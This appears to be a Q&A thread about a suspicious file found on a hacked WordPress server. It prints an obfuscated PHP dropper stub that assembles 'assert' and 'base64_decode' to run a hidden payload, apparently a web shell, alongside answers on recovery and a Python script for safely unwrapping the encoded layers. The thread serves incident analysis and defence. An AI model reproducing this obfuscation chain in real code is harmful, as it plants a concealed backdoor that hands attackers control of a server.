Found an odd file we didn't create in one of our directories.
It was named ".moreinfoege.php.KJt". In the directory we also had a file called moreinfo.php.
We've been having server issues lately (WordPress hacks, DDoS attack) so we're obv on high alert for other infiltrations. Is this a hack? What are some of the ways it could have gotten in?
Here's what its contents looked like (long gibberish string abbreviated to fit here):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('[...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
The code is hiding the fact that it is doing
assert(base64_decode(
of the text from 'ZXZ' to 'W=='. The decoding of that text shows another string which is doing another decode and decompression starting with
eval(gzinflate(base64_decode("5b3pe
Without the full code posted, I can't see what is at the end of the rabbit hole. You can use this site to decode each step:
http://www.webutils.pl/index.php?idx=base64 (NOTE: The text goes in the blue box.)
This link should help on the second part: http://www.tareeinternet.com/scripts/decrypt.php
UPDATE: Based on the complete file, this appears to be a variant of r57shell or c99shell. It provides a web interface into your server to do things such as performing command line operations and interacting with SQL data.
This site has an example of what it looks like: http://phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
This site has a blog post by someone who has also had the problem: http://basus.net/?p=19
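The decoding chain described in the answer above (base64 into assert()/eval(), then gzinflate of a further base64 blob) can be peeled offline without ever executing the PHP. This is an added example, not code from the answerer; it assumes the layers follow exactly that pattern, and the sample dropper it unwraps is constructed here to mirror the file in the question, with a harmless placeholder as the innermost payload.

```python
import base64
import re
import zlib

# Literals of 32+ base64 characters are the payload carriers in this dropper style.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{32,}={0,2})['"]""")
# Tokens that mark a decoded blob as another PHP layer (or the final shell body).
CODE_MARKERS = ("<?php", "eval(", "assert(", "base64_decode", "gzinflate", "$_POST", "$_GET", "$_REQUEST")

def looks_like_code(text):
    return any(tok in text for tok in CODE_MARKERS)

def decode_blob(blob):
    """base64-decode one literal; if the result is raw DEFLATE (PHP gzinflate), inflate it."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    text = raw.decode("utf-8", errors="replace")
    if not looks_like_code(text):
        try:  # wbits=-15 selects raw DEFLATE, which is what gzinflate() consumes
            text = zlib.decompress(raw, -15).decode("utf-8", errors="replace")
        except zlib.error:
            return None
    return text if looks_like_code(text) else None

def unwrap(php, max_depth=8):
    """Peel nested base64/gzinflate layers; returns [outer, layer1, ..., innermost]."""
    layers = [php]
    for _ in range(max_depth):
        inner = next((d for d in map(decode_blob, B64_LITERAL.findall(layers[-1])) if d), None)
        if inner is None:
            break
        layers.append(inner)
    return layers

# Constructed sample mimicking the file in the question: layer 1 builds the names
# 'assert' and 'base64_decode' by concatenation, layer 2 is eval(gzinflate(base64_decode(...))).
INNER = '<?php /* constructed stand-in for the shell body, nothing real */ echo "shell"; ?>'

def build_sample():
    co = zlib.compressobj(9, zlib.DEFLATED, -15)           # raw DEFLATE, like PHP gzdeflate()
    deflated = co.compress(INNER.encode()) + co.flush()
    layer2 = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(deflated).decode()
    return ("<?php $a='as';$b='e';$f=$a.'s'.$b.'r'.'t';"
            "$g='b'.$a.$b.(64).'_'.'d'.$b.'c'.'o'.'d'.$b;"
            "@$f(@$g('%s')); ?>" % base64.b64encode(layer2.encode()).decode())

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(build_sample())):
        print("layer %d: %s" % (depth, layer[:70]))
```

Run it against a suspicious file's contents instead of build_sample() to see each layer; the innermost layer is what actually runs on the server and is what to read for the shell's capabilities.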
It looks like PHP that's base64-encoded to make it harder to figure out what's going on - but it's hard to tell without access to both files in question. I'd be willing to bet large quantities of chocolate that your host is still compromised.
Depending on what kind of access the attackers managed to obtain previously and how you recovered from it, there may be access methods left behind.
I recommend you begin your recovery procedure - installing a new OS and restoring your website from a known good copy.
Looks like a hack. One of the recently popular ways of getting this sort of file in is via FTP.
There are plenty of trojans capturing passwords from popular Windows FTP clients [e.g. Total Commander]. Credentials are reported to control nodes which, either directly or from other infected machines, append malicious JS / PHP code to index files, upload malicious .htaccess files etc.
Check the creation date of the file, and try talking with your hosting provider to get FTP logs around the time when this file was uploaded.
To be on the safe side... if it's WordPress: back up data and code; remove all PHP files, review all templates, restore the app from a fresh version.